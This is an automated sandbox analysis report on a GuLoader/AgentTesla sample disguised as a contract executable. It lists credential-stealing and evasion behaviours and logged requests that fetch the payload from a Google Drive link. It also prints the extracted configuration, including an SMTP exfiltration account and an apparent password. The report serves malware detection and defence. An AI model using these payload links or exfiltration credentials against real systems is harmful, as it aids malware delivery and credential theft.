Loading ...

Play interactive tourEdit tour

Windows Analysis Report Contract and PI of 1500W.exe

Overview

General Information

Sample Name:Contract and PI of 1500W.exe
Analysis ID:1651
MD5:dbceab5b0f79168ffea64f16bf7f1263
SHA1:c5c25d75233ea8523111b1f964fbd482be973cd7
SHA256:7d6174dce4980e71b083ae63d3b165b50b20855edb40ffa10a06a8e46e765cab
Infos:

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected AgentTesla
Sigma detected: RegAsm connects to smtp port
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • Contract and PI of 1500W.exe (PID: 1404 cmdline: 'C:\Users\user\Desktop\Contract and PI of 1500W.exe' MD5: DBCEAB5B0F79168FFEA64F16BF7F1263)
    • RegAsm.exe (PID: 1388 cmdline: 'C:\Users\user\Desktop\Contract and PI of 1500W.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 4448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 1740 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 2904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • DnDcR.exe (PID: 6460 cmdline: 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=downl"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.278281355079.00000000022A0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: RegAsm.exe PID: 1388JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: RegAsm.exe PID: 1388JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview

            Networking:

            barindex
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 65.60.11.90, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 1388, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49818

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: Contract and PI of 1500W.exeMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=downl"}
            Source: RegAsm.exe.1388.9.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD2DA50 CryptUnprotectData,9_2_1CD2DA50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD2E0FB CryptUnprotectData,9_2_1CD2E0FB
            Source: Contract and PI of 1500W.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49810 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49811 version: TLS 1.2
            Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
            Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000F.00000002.278575001941.00000000008D2000.00000002.00020000.sdmp, DnDcR.exe, 00000011.00000002.278654263832.00000000007B2000.00000002.00020000.sdmp, DnDcR.exe.9.dr
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 4x nop then fsincos 2_2_004022C3
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 4x nop then fsincos 2_2_004031BE

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49818 -> 65.60.11.90:587
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=downl
            Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ovq1830ci2vfc1r9jg3dm4bs2m26dfl/1634174850000/08714151441044389622/*/1iHaEbeRZQsul94yNukP5elwMyJtohxrw?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-4k-docs.googleusercontent.comConnection: Keep-Alive
            Source: global trafficTCP traffic: 192.168.11.20:49818 -> 65.60.11.90:587
            Source: global trafficTCP traffic: 192.168.11.20:49818 -> 65.60.11.90:587
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
            Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: RegAsm.exe, 00000009.00000002.282791482237.000000001DEFD000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
            Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: http://VpGUaC.com
            Source: RegAsm.exe, 00000009.00000002.282780207491.00000000010C6000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 00000009.00000002.282780207491.00000000010C6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 00000009.00000002.282791915175.000000001DF60000.00000004.00000001.sdmpString found in binary or memory: http://friendsequipment.com
            Source: RegAsm.exe, 00000009.00000002.282791915175.000000001DF60000.00000004.00000001.sdmpString found in binary or memory: http://mail.friendsequipment.com
            Source: RegAsm.exe, 00000009.00000003.279197125200.000000002115D000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
            Source: RegAsm.exe, 00000009.00000002.282791915175.000000001DF60000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.279169743645.000000001CA71000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.282791482237.000000001DEFD000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.282792014580.000000001DF75000.00000004.00000001.sdmpString found in binary or memory: https://TDIvwVTMK1.org
            Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%4
            Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
            Source: RegAsm.exe, 00000009.00000003.278253316698.000000000110F000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: RegAsm.exe, 00000009.00000002.282779842058.000000000107F000.00000004.00000020.sdmpString found in binary or memory: https://doc-10-4k-docs.googleusercontent.com/U
            Source: RegAsm.exe, 00000009.00000003.278253316698.000000000110F000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.278253365686.00000000010CB000.00000004.00000001.sdmpString found in binary or memory: https://doc-10-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ovq1830
            Source: RegAsm.exe, 00000009.00000002.282779842058.000000000107F000.00000004.00000020.sdmpString found in binary or memory: https://doc-10-4k-docs.googleusercontent.com/~
            Source: RegAsm.exe, 00000009.00000002.282779498827.0000000001038000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
            Source: RegAsm.exe, 00000009.00000002.282779364938.0000000000F40000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw
            Source: RegAsm.exe, 00000009.00000002.282779498827.0000000001038000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw1f
            Source: RegAsm.exe, 00000009.00000002.282779498827.0000000001038000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw9e
            Source: RegAsm.exe, 00000009.00000002.282791056224.000000001DEA2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
            Source: RegAsm.exe, 00000009.00000002.282792090697.000000001DF7D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
            Source: RegAsm.exe, 00000009.00000002.282792090697.000000001DF7D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
            Source: RegAsm.exe, 00000009.00000002.282792090697.000000001DF7D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
            Source: RegAsm.exe, 00000009.00000002.282791056224.000000001DEA2000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: RegAsm.exe, 00000009.00000002.282790628196.000000001DE51000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1iHaEbeRZQsul94yNukP5elwMyJtohxrw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7ovq1830ci2vfc1r9jg3dm4bs2m26dfl/1634174850000/08714151441044389622/*/1iHaEbeRZQsul94yNukP5elwMyJtohxrw?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-4k-docs.googleusercontent.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49810 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49811 version: TLS 1.2

            Spam, unwanted Advertisements and Ransom Demands:

            barindex
            Modifies the hosts fileShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

            System Summary:

            barindex
            Potential malicious icon foundShow sources
            Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
            Source: Contract and PI of 1500W.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_004022C32_2_004022C3
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_004032492_2_00403249
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_004032CA2_2_004032CA
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_004031BE2_2_004031BE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CA3A509_2_00CA3A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CA43209_2_00CA4320
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CAD4909_2_00CAD490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CAC7309_2_00CAC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CA37089_2_00CA3708
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CB15F09_2_00CB15F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00CB6F109_2_00CB6F10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00D5F1E09_2_00D5F1E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00D594CF9_2_00D594CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00D5BEF89_2_00D5BEF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00D5951F9_2_00D5951F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD224809_2_1CD22480
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD2B1709_2_1CD2B170
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD2A9289_2_1CD2A928
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD25E289_2_1CD25E28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD2B0709_2_1CD2B070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD23DB89_2_1CD23DB8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1CD2F1309_2_1CD2F130
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1DCE5E089_2_1DCE5E08
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1DCE4ACC9_2_1DCE4ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1DCE6AD09_2_1DCE6AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1DCE5E079_2_1DCE5E07
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_1DCE6AF19_2_1DCE6AF1
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 15_2_008D3DFE15_2_008D3DFE
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 15_2_02CF09B015_2_02CF09B0
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeCode function: 17_2_007B3DFE17_2_007B3DFE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00CA6A80 appears 52 times
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: String function: 0040177E appears 94 times
            Source: Contract and PI of 1500W.exe, 00000002.00000002.278282493434.0000000002B50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameFocalisi.exeFE2X vs Contract and PI of 1500W.exe
            Source: Contract and PI of 1500W.exe, 00000002.00000002.278280053788.000000000041C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFocalisi.exe vs Contract and PI of 1500W.exe
            Source: Contract and PI of 1500W.exeBinary or memory string: OriginalFilenameFocalisi.exe vs Contract and PI of 1500W.exe
            Source: Contract and PI of 1500W.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: edgegdi.dllJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
            Source: Contract and PI of 1500W.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Contract and PI of 1500W.exe 'C:\Users\user\Desktop\Contract and PI of 1500W.exe'
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Contract and PI of 1500W.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe 'C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe'
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Contract and PI of 1500W.exe' Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Roaming\DnDcRJump to behavior
            Source: classification engineClassification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@8/6@3/3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2904:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2904:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6440:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
            Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000F.00000002.278575001941.00000000008D2000.00000002.00020000.sdmp, DnDcR.exe, 00000011.00000002.278654263832.00000000007B2000.00000002.00020000.sdmp, DnDcR.exe.9.dr

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000002.00000002.278281355079.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_0040205A push cs; retf 2_2_004020FD
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_0040705F push edi; retf 2_2_004071E8
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_00408200 push FF3F4922h; retf 2_2_00408205
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_00406C0D pushad ; iretd 2_2_00406C1B
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_00407145 push edi; retf 2_2_004071E8
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_0040630D pushfd ; ret 2_2_00406318
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_004059F3 push esi; iretd 2_2_004059F7
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A3832 push esp; retn 000Dh2_2_022A384D
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A2402 push esp; retn 004Fh2_2_022A2405
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A106C push esp; retf 0079h2_2_022A106D
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A3C62 push ecx; iretd 2_2_022A3C63
            Source: C:\Users\user\Desktop\Contract and PI of 1500W.exeCode function: 2_2_022A1863 push esp; retn 005Ch2_2_022A1865
